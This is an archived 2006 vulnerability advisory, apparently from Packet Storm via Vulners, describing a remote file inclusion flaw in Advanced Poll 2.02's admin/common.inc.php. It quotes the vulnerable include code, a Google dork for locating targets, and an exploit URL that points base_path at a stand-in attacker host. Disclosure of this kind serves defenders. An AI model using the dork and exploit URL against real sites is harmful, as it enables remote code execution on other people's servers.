Lucene search
K

solpot-adv-02.txt

🗓️ 24 Jul 2006 00:00:00Reported by SolpotType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 24 Views

Remote File Inclusion in Advanced Poll ver 2.0

Code
`#############################SolpotCrew Community################################   
#   
# Advanced Poll ver 2.02 (base_path) Remote File Inclusion   
#   
# Vendor site : http://www.proxy2.de/scripts.php   
#   
#################################################################################   
#   
#   
# Bug Found By :Solpot a.k.a (k. Hasibuan)   
#   
# contact: [email protected]   
#   
# Website : http://www.solpotcrew.org/adv/solpot-adv-02.txt  
#   
################################################################################   
#   
#   
# Greetz: choi , cow_1seng , Ibnusina , Lappet_tutung , h4ntu , r4dja ,   
# L0sTBoy , Matdhule , setiawan , barbarosa, NpR , Fungky , Blue|spy  
# home_edition2001 , Rendy ,Tje , m3lky , no-profile  
# and all crew #mardongan @ irc.dal.net   
#   
#   
###############################################################################   
Input passed to the "base_path" is not properly verified   
before being used to include files. This can be exploited to execute   
arbitrary PHP code by including files from local or external resources.   
  
code from /admin/common.inc.php   
  
$pollvars['SELF'] = basename($PHP_SELF);   
if (file_exists("$base_path/lang/$pollvars[lang]")) {   
include ("$base_path/lang/$pollvars[lang]");   
} else {   
include ("$base_path/lang/english.php");   
  
google dork : inurl:comments.php?action= send id   
  
EXPLOIT :   
  
http://somehost/[path_advanced_poll]/admin/common.inc.php?base_path=http://atacker   
  
##############################MY LOVE JUST FOR U RIE#########################   
######################################E.O.F##################################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Jul 2006 00:00Current
7.4High risk
Vulners AI Score7.4
24